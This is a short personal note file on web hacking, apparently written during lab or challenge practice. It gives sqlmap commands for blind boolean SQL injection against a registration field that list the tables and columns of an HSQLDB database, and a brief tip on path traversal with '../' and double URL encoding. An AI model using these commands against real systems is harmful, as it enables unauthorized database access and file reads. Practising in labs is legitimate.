Anonymvs17/hacking/notes/web/A1_sqlInjection.md

 ``sqlmap -r "/home/kali/Documents/sqlInj.raw" --string "please try to register with a different username" -p username_reg --thread=10 --technique=B --dbms="HSQLDB" -D PUBLIC --tables --level=5 --risk=3``
 usually this returns us a table which we can enumerate its rows by f.e.: CHALLENGE_USERS `sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --thread=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS --columns --level=5 --risk=3`

+# Path traversal

+for example in file upload try to use on linux `../` to navigate back in the url (might be achievable via POST request).

+example: `http://www.test.com?file=../yolo.txt` or encode URL encode it before (even two times)